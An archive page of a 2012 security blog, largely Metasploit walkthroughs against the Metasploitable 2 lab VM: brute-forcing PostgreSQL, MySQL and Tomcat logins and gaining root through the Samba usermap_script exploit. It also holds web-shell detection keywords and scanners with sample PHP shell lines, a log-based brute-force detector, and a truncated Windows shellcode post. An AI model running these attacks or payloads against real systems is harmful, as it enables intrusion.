Author archive

Attacking PostgreSQL On Metasploitable 2

18 June 2012


In this article we will see how we can attack a system that runs a PostgreSQL database.

Let's say that we have performed a port scan on a server and identified that it is running PostgreSQL on port 5432.

Scanning with nmap:

nmap -sV


We will open the Metasploit Framework and search for "postgresql":

msf > search postgresql

Matching Modules

Name                                         Disclosure Date  Rank       Description
----                                         ---------------  ----       -----------
auxiliary/admin/postgres/postgres_readfile                    normal     PostgreSQL Server Generic Query
auxiliary/admin/postgres/postgres_sql                         normal     PostgreSQL Server Generic Query
auxiliary/scanner/postgres/postgres_login                     normal     PostgreSQL Login Utility
auxiliary/scanner/postgres/postgres_version                   normal     PostgreSQL Version Probe
exploit/windows/postgres/postgres_payload    2009-04-10       excellent  PostgreSQL for Microsoft Windows Payload Execution

We will use the postgres_login scanner.

Usage Information:

msf > use auxiliary/scanner/postgres/postgres_login
msf auxiliary(postgres_login) > set RHOSTS [TARGET HOST RANGE]
msf auxiliary(postgres_login) > run

Set the target address range:

msf>set RHOSTS


msf  auxiliary(postgres_login) > exploit

[*] Postgres - [01/21] - Trying username:'postgres' with password:'' on database 'template1'
[-] Postgres - Invalid username or password: 'postgres':''
[-] Postgres - [01/21] - Username/Password failed.
[*] Postgres - [02/21] - Trying username:'' with password:'' on database 'template1'
[-] Postgres - Invalid username or password: '':''
[-] Postgres - [02/21] - Username/Password failed.
[*] Postgres - [03/21] - Trying username:'scott' with password:'' on database 'template1'
[-] Postgres - Invalid username or password: 'scott':''
[-] Postgres - [03/21] - Username/Password failed.
[*] Postgres - [04/21] - Trying username:'admin' with password:'' on database 'template1'


This scanner is preconfigured with the Metasploit Framework's default PostgreSQL wordlists, so we will use them here:

USERPASS_FILE  C:/Program Files/Rapid7/framework/msf3/data/wordlists/postgres_default_userpass.txt  no  File containing (space-seperated) users and passwords, one pair per line
USER_FILE      C:/Program Files/Rapid7/framework/msf3/data/wordlists/postgres_default_user.txt      no  File containing users, one per line

Waiting, waiting and:

We have the user name "postgres" and the password "postgres".

Now we can log in as the postgres user:




How to find backdoor PHP shell scripts on a server

17 June 2012, 1 comment


When hackers get access to your website server, they sometimes install a backdoor shell script designed to allow them to regain entry even after you’ve cleaned up the site, repaired the original security hole that allowed the hack to occur, otherwise improved site security, and even installed measures to try to lock the hackers out.

A backdoor script can be called from a browser like any other web page. It gives its user a web-page interface for downloading and uploading, viewing or modifying files, creating directories, and otherwise managing the site, using PHP's ability to read and write files and to pass commands through to the operating system.

One way to find these scripts is by searching website access logs for the suspicious lines that can be generated when someone uses the scripts to modify site files.

Backdoor scripts often need PHP functions that most legitimate scripts don't, so you can search the files in your site for those functions with any text-search utility. Keywords to search for:

  • passthru
  • shell_exec
  • system
  • phpinfo
  • base64_decode
  • edoced_46esab
  • chmod
  • mkdir
  • ` (backticks with an operating system command between them)
  • fopen
  • fclose
  • readfile

On a Linux server, the grep program is already installed as part of the operating system. The only problem is figuring out how to launch it.

If you have command line access to your server (SSH), there’s no problem. You can run it from the command line and have the results displayed to you.

Sample text searches for suspicious PHP code.

Do the search once for each of the suggested PHP keywords listed above.

grep -Rn "mkdir *(" public_html/


grep -RPn "(passthru|shell_exec|system|phpinfo|base64_decode|chmod|mkdir|fopen|fclose|readfile) *\(" public_html/

Or we can use the following script ( source )

#!/usr/bin/perl -w
#usage: ./ <sensitivity 1-50> <directory to scan>
use strict;
use File::Find;

# Score threshold (default 10) and directory to walk (default: current directory).
my $sens   = shift || 10;
my $folder = shift || './';
find(\&backdoor, "$folder");

sub backdoor {
    # File::Find sets $_ to the file name and chdirs into its directory; only look at .php and .txt files.
    return unless -f $_ && /\.(php|txt)/;

    open(my $IN, "<", $_) || die "can not open datei $File::Find::name: $!";
    my @file = <$IN>;
    close $IN;

    # maybe evil stuff: one point per line calling a function web shells rely on
    my $score = grep(/function_exists\(|phpinfo\(|safe_?mode|shell_exec\(|popen\(|passthru\(|system\(|myshellexec\(|exec\(|getpwuid\(|getgrgid\(|fileperms\(/i, @file);
    # probably evil stuff: 50 points per line that feeds request input to eval/include/system or names a known shell
    my $tempscore = grep(/\`\$\_(post|request|get).{0,20}\`|(include|require|eval|system|passthru|shell_exec).{0,10}\$\_(post|request|get)|eval.{0,10}base64_decode|back_connect|backdoor|r57|PHPJackal|PhpSpy|GiX|Fx29SheLL|w4ck1ng|milw0rm|PhpShell|k1r4|FeeLCoMz|FaTaLisTiCz|Ve_cENxShell|UnixOn|C99madShell|Spamfordz|Locus7s|c100|c99|x2300|cgitelnet|webadmin|cybershell|STUNSHELL|Pr!v8|PHPShell|KaMeLeOn|S4T|oRb|tryag|sniper|noexecshell|\/etc\/passwd|revengans/i, @file);
    $score += 50 * $tempscore;
    print "$score - Possible backdoor : $File::Find::name\n" if ($score > $sens - 1);

    # PHP tags or include() inside a file that is not .php (e.g. a .txt "upload") are a strong signal on their own
    print "5000 - Possible backdoor (php in non-php file): $File::Find::name\n"
        if ($File::Find::name !~ /\.php$/ && grep(/(\<\?php|include(\ |\())/i, @file));
}
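A Python version of the same search, added here as an example (it is not code from the post or from the Perl script's source): it walks a directory tree, scores each .php/.txt file line by line using the keyword list above, and adds the two indicators the grep pattern cannot express cleanly (the backtick operator and the reversed string edoced_46esab) together with the Perl script's "request input reaching eval/include/system" and "PHP in a non-PHP file" checks. The weights, the indicator names and the small site tree it builds to run against are this example's own constructions.

```python
"""Score PHP files by the web-shell indicators listed above.

Added example, not code from the original post or from the Perl script's
source. Weights and the sample site are constructed for this example.
"""
import os
import re
import tempfile

# (regex, weight): one point for an ordinary dangerous call, far more for
# patterns that have almost no legitimate use.
INDICATORS = {
    "dangerous_call": (re.compile(
        r"\b(passthru|shell_exec|system|phpinfo|base64_decode|chmod|mkdir|"
        r"fopen|fclose|readfile)\s*\(", re.I), 1),
    "reversed_base64": (re.compile(r"edoced_46esab", re.I), 50),
    # backticks are PHP's shell-execution operator, but MySQL identifier
    # quoting ("SELECT `id`") also uses them, so keep the weight low
    "backtick": (re.compile(r"`[^`\n]+`"), 5),
    "input_to_exec": (re.compile(
        r"\b(eval|assert|include|require|system|passthru|shell_exec|exec)"
        r"\s*\(?\s*.{0,20}\$_(POST|GET|REQUEST)", re.I), 50),
}
PHP_IN_NON_PHP_WEIGHT = 5000  # same spirit as the Perl script's fixed 5000 score


def score_file(path):
    """Return (score, hits); hits is a list of (line_no, indicator_name)."""
    score, hits = 0, []
    is_php = path.lower().endswith((".php", ".phtml"))
    with open(path, "r", encoding="utf-8", errors="replace") as fh:
        for lineno, line in enumerate(fh, 1):
            for name, (rx, weight) in INDICATORS.items():
                if rx.search(line):
                    hits.append((lineno, name))
                    score += weight
            if not is_php and "<?php" in line.lower():
                hits.append((lineno, "php_in_non_php"))
                score += PHP_IN_NON_PHP_WEIGHT
    return score, hits


def scan_tree(root, threshold=10, exts=(".php", ".phtml", ".txt")):
    """Walk `root`; return {relative_path: (score, hits)} for files scoring >= threshold."""
    findings = {}
    for dirpath, _dirs, files in os.walk(root):
        for fn in files:
            if not fn.lower().endswith(exts):
                continue
            path = os.path.join(dirpath, fn)
            score, hits = score_file(path)
            if score >= threshold:
                rel = os.path.relpath(path, root).replace(os.sep, "/")
                findings[rel] = (score, hits)
    return findings


def build_sample_site():
    """Create a throw-away site tree of constructed files and return its root."""
    root = tempfile.mkdtemp(prefix="site_")
    samples = {
        # ordinary application code: no indicators
        "index.php": "<?php\n$db = new PDO('mysql:host=localhost;dbname=shop', 'u', 'p');\n",
        # legitimate backtick use (identifier quoting): scores 5, under threshold
        "includes/db.php": "<?php\n$r = $db->query(\"SELECT `id` FROM `users`\");\n",
        # dropped web shell: request input fed straight to shell_exec/system
        "images/cache.php": ("<?php\nif (isset($_GET['c'])) { echo shell_exec($_GET['c']); }\n"
                             "@system($_POST['x']);\n"),
        # PHP hidden in an "upload": eval(base64_decode($_REQUEST)) inside a .txt
        "uploads/readme.txt": "<?php eval(base64_decode($_REQUEST['p'])); ?>\n",
    }
    for rel, body in samples.items():
        path = os.path.join(root, rel)
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "w", encoding="utf-8") as fh:
            fh.write(body)
    return root


if __name__ == "__main__":
    site = build_sample_site()
    for rel, (score, hits) in sorted(scan_tree(site).items(), key=lambda kv: -kv[1][0]):
        print(f"{score:5d}  {rel}  {sorted(set(h for _, h in hits))}")
```

Run it directly to print the findings. The `includes/db.php` sample shows why the backtick indicator carries a low weight: MySQL identifier quoting uses the same character, so a single hit stays under the threshold and only becomes interesting when it compounds with other indicators.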


Web Shell Detection Using NeoPI

Category: BackDoor

Metasploitable 2 – Apache Tomcat Exploitation

16 June 2012


In this post we will focus on the Apache Tomcat Web server and how we can discover the administrator’s credentials in order to gain access to the remote system – Metasploitable 2.

So we are performing our internal penetration test and have discovered Apache Tomcat running on a remote system, Metasploitable Linux 2, on port 8180.

(screenshot: nmap scan)

Our next step is to start the Metasploit Framework and search for "tomcat":

msf> search tomcat

We have found an auxiliary scanner which will be the tool for our attempt to login to the Tomcat Application Manager.



So we run the scanner and we are waiting to see if it will discover any valid credentials:

(screenshot: run exploit)

We see user "tomcat" with password "tomcat".





Metasploitable 2 – Bruteforce MySQL Using Metasploit

15 June 2012


I will demonstrate how to brute force MySQL logins using Metasploit. This is again another attack against the Metasploitable 2 distribution I mentioned in my previous post.

This is very simple:

c:\Program Files\Rapid7\framework\msfconsole.bat

Type :

msf>db_connect bt:my_pass@localhost:5432/msf3




We see that MySQL is running:

3306  tcp    mysql        open   MySQL 5.0.51a-3ubuntu5

Search for an exploit:

msf>search mysql



msf > use scanner/mysql/mysql_login
msf auxiliary(mysql_login) > show options



Run exploit:

msf auxiliary(mysql_login) > exploit

[*] - Found remote MySQL version 5.0.51a
[*] Trying username:'admin' with password:''
[*] failed to login as 'admin' with password ''
[*] Trying username:'god' with password:''
[*] failed to login as 'god' with password ''


The list is long


[*] Trying username:'root' with password:''
[+] - SUCCESSFUL LOGIN 'root' : ''
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(mysql_login) >

User "root", no password.

mysql -h -u root

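The two credential-guessing runs shown on this page (postgres_login against PostgreSQL in the post above and mysql_login against MySQL here) leave their mirror image in the database servers' own logs, which is where a defender catches them. The following Python script is an added example, not code from the post: it parses PostgreSQL FATAL authentication lines (assuming a log_line_prefix of '%t [%p] %h ' so the client address is present; the default prefix is empty) and MySQL error-log "Access denied" warnings (MySQL 5.x writes these for new connections only when log_warnings is set above 1), then reports any client that fails at least ten logins within one minute. Every log line is constructed inside the script.

```python
"""Spot password-guessing runs like the postgres_login and mysql_login scans
from the database servers' own logs.

Added example, not code from the original post. Both log line shapes are
constructed here: PostgreSQL with an assumed log_line_prefix of '%t [%p] %h '
and the MySQL 5.x error log with log_warnings > 1.
"""
import re
from collections import defaultdict
from datetime import datetime, timedelta

# PostgreSQL: FATAL lines for a wrong password and for a non-existent role
PG_RX = re.compile(
    r"^(?P<ts>\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2}) \S+ \[\d+\] (?P<host>\S+) FATAL:\s+"
    r'(?:password authentication failed for user|role) "(?P<user>[^"]+)"')
# MySQL 5.x error log with log_warnings > 1
MY_RX = re.compile(
    r"^(?P<ts>\d{6} \d{2}:\d{2}:\d{2}) \[Warning\] Access denied for user "
    r"'(?P<user>[^']*)'@'(?P<host>[^']+)'")


def parse_auth_failure(line):
    """Return (timestamp, service, client_host, user) for a failed login, else None."""
    m = PG_RX.match(line)
    if m:
        return (datetime.strptime(m["ts"], "%Y-%m-%d %H:%M:%S"), "postgresql",
                m["host"], m["user"])
    m = MY_RX.match(line)
    if m:
        return (datetime.strptime(m["ts"], "%y%m%d %H:%M:%S"), "mysql",
                m["host"], m["user"])
    return None


def find_bruteforce(lines, threshold=10, window=timedelta(seconds=60)):
    """Group failures by (service, client) and report the densest `window` per
    client when it holds at least `threshold` failures.
    Returns {(service, client): {"failures", "users", "first", "last"}}."""
    events = defaultdict(list)
    for line in lines:
        parsed = parse_auth_failure(line)
        if parsed:
            ts, service, host, user = parsed
            events[(service, host)].append((ts, user))

    alerts = {}
    for key, evs in events.items():
        evs.sort()
        best, start = (0, 0, 0), 0          # (count, first_idx, last_idx)
        for end in range(len(evs)):
            while evs[end][0] - evs[start][0] > window:   # slide the window forward
                start += 1
            if end - start + 1 > best[0]:
                best = (end - start + 1, start, end)
        count, s, e = best
        if count >= threshold:
            span = evs[s:e + 1]
            alerts[key] = {"failures": count,
                           "users": sorted({u for _, u in span}),
                           "first": span[0][0], "last": span[-1][0]}
    return alerts


def sample_log_lines():
    """Constructed lines: a 12-name default-account run against PostgreSQL and an
    11-name run against MySQL, both from 10.0.0.5, plus one harmless mistyped
    password per service from somewhere else."""
    pg_users = ["postgres", "scott", "admin", "root", "guest", "test",
                "user", "dba", "pgsql", "sa", "monitor", "postgres"]
    my_users = ["admin", "god", "root", "mysql", "test", "guest",
                "web", "backup", "dba", "sa", "monitor"]
    lines = []
    for i, u in enumerate(pg_users):
        msg = (f'password authentication failed for user "{u}"' if u == "postgres"
               else f'role "{u}" does not exist')
        lines.append(f"2012-06-18 21:05:{i:02d} UTC [40{i:02d}] 10.0.0.5 FATAL:  {msg}")
    lines.append('2012-06-18 21:09:30 UTC [4100] 10.0.0.7 FATAL:  '
                 'password authentication failed for user "alice"')
    for i, u in enumerate(my_users):
        lines.append(f"120618 21:06:{2 * i:02d} [Warning] Access denied for user "
                     f"'{u}'@'10.0.0.5' (using password: NO)")
    lines.append("120618 21:30:00 [Warning] Access denied for user 'root'@'localhost' "
                 "(using password: YES)")
    return lines


if __name__ == "__main__":
    for (service, host), info in find_bruteforce(sample_log_lines()).items():
        print(f"{service}: {info['failures']} failures from {host} between "
              f"{info['first']} and {info['last']}, {len(info['users'])} distinct users")
```

The number of distinct user names inside the window is the tell-tale of a wordlist run like the ones on this page: a human mistyping a password retries one account, while postgres_login and mysql_login walk a list of default accounts from one source in a few seconds.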


Rapid7 – Metasploitable 2

14 June 2012, 4 comments

Metasploitable 2

The Metasploitable virtual machine is an intentionally vulnerable version of Ubuntu Linux designed for testing security tools and demonstrating common vulnerabilities. Version 2 of this virtual machine is available for download from and ships with even more vulnerabilities than the original image. This virtual machine is compatible with VMWare, VirtualBox, and other common virtualization platforms.

Metasploitable 2 running on VMware  looks like this:



Here we go


Check the version

msf > version
Framework: 4.4.0-dev.15205
Console  : 4.4.0-dev.15168
msf >

Connect to the database:

(screenshot: Connect To the DataBase)

Now we should be able to enter the db_nmap command from within msfconsole to run nmap and have its results automatically stored in our new database.

msf > db_nmap -sS -A



[*] Nmap: MAC Address: 00:0C:29:BF:08:FB (VMware)
[*] Nmap: Device type: general purpose
[*] Nmap: Running: Linux 2.6.X
[*] Nmap: OS details: Linux 2.6.9 - 2.6.31
[*] Nmap: Network Distance: 1 hop
[*] Nmap: Service Info: Hosts:  metasploitable.localdomain, localhost, irc.Metasploitable.LAN; OSs: Unix, Linux
[*] Nmap: Host script results:
[*] Nmap: |_nbstat: NetBIOS name: METASPLOITABLE, NetBIOS user: <unknown>, NetBIOS MAC: <unknown>
[*] Nmap: | smb-os-discovery:
[*] Nmap: |   OS: Unix (Samba 3.0.20-Debian)
[*] Nmap: |   Name: WORKGROUP\Unknown
[*] Nmap: |_  System time: 2012-06-14 21:07:53 UTC-4
[*] Nmap: HOP RTT     ADDRESS
[*] Nmap: 1   0.44 ms
[*] Nmap: OS and Service detection performed. Please report any incorrect results at .
[*] Nmap: Nmap done: 1 IP address (1 host up) scanned in 176.79 seconds
msf >


msf > services


host             port  proto  name         state  info
----             ----  -----  ----         -----  ----
                 21    tcp    ftp          open   vsftpd 2.3.4
                 22    tcp    ssh          open   OpenSSH 4.7p1 Debian 8ubuntu1 protocol 2.0
                 23    tcp    telnet       open   Linux telnetd
                 25    tcp    smtp         open   Postfix smtpd
                 53    tcp    domain       open   ISC BIND 9.4.2
                 80    tcp    http         open   Apache httpd 2.2.8 (Ubuntu) DAV/2
                 110   tcp    pop3-proxy   open   AVG pop3 proxy broken
                 111   tcp    rpcbind      open   2 rpc #100000
                 139   tcp    netbios-ssn  open   Samba smbd 3.X workgroup: WORKGROUP
                 445   tcp    netbios-ssn  open   Samba smbd 3.X workgroup: WORKGROUP
                 512   tcp    exec         open   netkit-rsh rexecd
                 513   tcp    login        open
                 514   tcp    shell        open
                 1099  tcp    jrmi         open   GNU Classpath grmiregistry
                 1524  tcp    ingreslock   open
                 2049  tcp    nfs          open   2-4 rpc #100003
                 2121  tcp    ccproxy-ftp  open
                 3306  tcp    mysql        open   MySQL 5.0.51a-3ubuntu5
                 5432  tcp    postgresql   open   PostgreSQL DB 8.3.0 - 8.3.7
                 5900  tcp    vnc          open   VNC protocol 3.3
                 6000  tcp    x11          open   access denied
                 6667  tcp    irc          open   Unreal ircd
                 8009  tcp    ajp13        open   Apache Jserv Protocol v1.3
                 8180  tcp    http         open   Apache Tomcat/Coyote JSP engine 1.1

Let’s search for a Samba exploit and try it against the system:

msf>search samba


The first shot is:

msf > use exploit/multi/samba/usermap_script

msf  exploit(usermap_script) > show options

Module options (exploit/multi/samba/usermap_script):

Name   Current Setting  Required  Description
----   ---------------  --------  -----------
RHOST                        yes       The target address
RPORT  139              yes       The target port

Exploit target:

Id  Name
—  —-
0   Automatic

msf  exploit(usermap_script) > set RHOST
msf  exploit(usermap_script) > exploit




I'm "super user":

uid=0(root) gid=0(root)
uname -a
Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686 GNU/Linux


Win32/7 Ultimate mspaint.exe ShellCode

8 June 2012


Author: Ayrbyte
Link: -
Version: -
Category: Win32/7 local
Tested on: Windows 7 Ultimate
Code: C++

(disassembly)

00403000   BB 449BB40E      MOV EBX,0EB49B44
00403005   33C9             XOR ECX,ECX
00403007   DBC4             FCMOVNB ST,ST(4)
00403009   B1 32            MOV CL,32
0040300B   D97424 F4        FSTENV (28-BYTE) PTR SS:[ESP-C]
0040300F   5D               POP EBP
00403010   315D 13          XOR DWORD PTR SS:[EBP+13],EBX
00403013   83C5 04          ADD EBP,4
00403016   035D 0F          ADD EBX,DWORD PTR SS:[EBP+F]
00403019  -E2 B1            LOOPD SHORT msgbox.00402FCC
0040301B   67:5C            POP ESP
0040301D   8739             XCHG DWORD PTR DS:[ECX],EDI
0040301F   98               CWDE
00403020   9D               POPFD
00403021   F8               CLC
00403022   B0 7D            MOV AL,7D
00403024   AC               LODS BYTE PTR DS:[ESI]
0040302B   5B               POP EBX
0040302C   2E:70 E3         JO SHORT msgbox.00403012
0040302F   4F               DEC EDI
00403030   A5               MOVS DWORD PTR ES:[EDI],DWORD PTR DS:[ES>
00403031   F4               HLT
00403032   2B7F 0E          SUB EDI,DWORD PTR DS:[EDI+E]
00403035   B2 0D            MOV DL,0D
00403037   4E               DEC ESI
00403038   8F               ???
00403039  -72 91            JB SHORT msgbox.00402FCC
0040303B   1C 53            SBB AL,53
0040303D   14 6D            ADC AL,6D
0040303F   5F               POP EDI
00403040   80F6 4C          XOR DH,4C
00403043   90               NOP
00403044   D5 F7            AAD 0F7
00403046   89CD             MOV EBP,ECX
00403048   16               PUSH SS
00403049   A5               MOVS DWORD PTR ES:[EDI],DWORD PTR DS:[ES>
0040304A   42               INC EDX
0040304B   99               CDQ
0040304C   855A E7          TEST DWORD PTR DS:[EDX-19],EBX
0040304F   DF15 5A275425    FIST WORD PTR DS:[2554275A]
00403055   24 42            AND AL,42
00403057   AB               STOS DWORD PTR ES:[EDI]
00403058   D29E 4DFC4B94    RCR BYTE PTR DS:[ESI+944BFC4D],CL
0040305E   05 E4E0F2B5      ADD EAX,B5F2E0E4
00403063   15 24E1895C      ADC EAX,5C89E124
00403068   41               INC ECX
00403069   D27A 5F          SAR BYTE PTR DS:[EDX+5F],CL
0040306C   832A 83          SUB DWORD PTR DS:[EDX],-7D
0040306F   51               PUSH ECX
00403070  ^EB E1            JMP SHORT msgbox.00403053
00403072   BA 5DE6F8FB      MOV EDX,FBF8E65D
00403077   5A               POP EDX
00403078   198F F798A488    SBB DWORD PTR DS:[EDI+88A498F7],ECX
0040307E   CC               INT3
0040307F   E3 72            JECXZ SHORT msgbox.004030F3
00403081   1C D0            SBB AL,0D0
00403083   44               INC ESP
00403084   F0:8630          LOCK XCHG BYTE PTR DS:[EAX],DH
00403087  ^74 D5            JE SHORT msgbox.0040305E
00403089   51               PUSH ECX
0040308A   B3 7A            MOV BL,7A
0040308C   92               XCHG EAX,EDX
0040308D   16               PUSH SS
0040308E   9B               WAIT
0040308F   9E               SAHF
00403090   25 FA909BAE      AND EAX,AE9B90FA
00403095   FD               STD
00403096   76 2A            JBE SHORT msgbox.004030C2
00403098   F4               HLT
00403099   D952 76          FST DWORD PTR DS:[EDX+76]
0040309C   AE               SCAS BYTE PTR ES:[EDI]
0040309D   40               INC EAX
0040309E   C3               RETN
0040309F   D201             ROL BYTE PTR DS:[ECX],CL
004030A1   7C 13            JL SHORT msgbox.004030B6
004030A3   BA FED85829      MOV EDX,2958D8FE
004030A8   EA 5B0324ED EE3E JMP FAR 3EEE:ED24035B
004030AF   01ED             ADD EBP,EBP
004030B1   F0:40            LOCK INC EAX
004030B3   2286 C1CBADD1    AND AL,BYTE PTR DS:[ESI+D1ADCBC1]
004030B9   DD1E             FSTP QWORD PTR DS:[ESI]
004030BB   8A2E             MOV CH,BYTE PTR DS:[ESI]
004030BD   94               XCHG EAX,ESP
004030BE   02BB A671D7F9    ADD BH,BYTE PTR DS:[EBX+F9D771A6]
004030C4   AA               STOS BYTE PTR ES:[EDI]
004030C5   8102 3DD301A6    ADD DWORD PTR DS:[EDX],A601D33D
004030CB   BE 2019C3BB      MOV ESI,BBC31920
004030D0   6D               INS DWORD PTR ES:[EDI],DX
004030D1   9D               POPFD
004030D2   38B6 FE483E65    CMP BYTE PTR DS:[ESI+653E48FE],DH
004030D8   FE               ???
004030D9   58               POP EAX
004030DA   53               PUSH EBX
004030DB   FA               CLI
004030DC   70 02            JO SHORT msgbox.004030E0
004030DE   C2 9204          RETN 492
004030E1   C400             LES EAX,FWORD PTR DS:[EAX]

Exploit :

#include <windows.h>
char string[] =
int main()
  ((void (*)(void))string)();
Category: Exploit

control – windows firewall from the command line

7 June 2012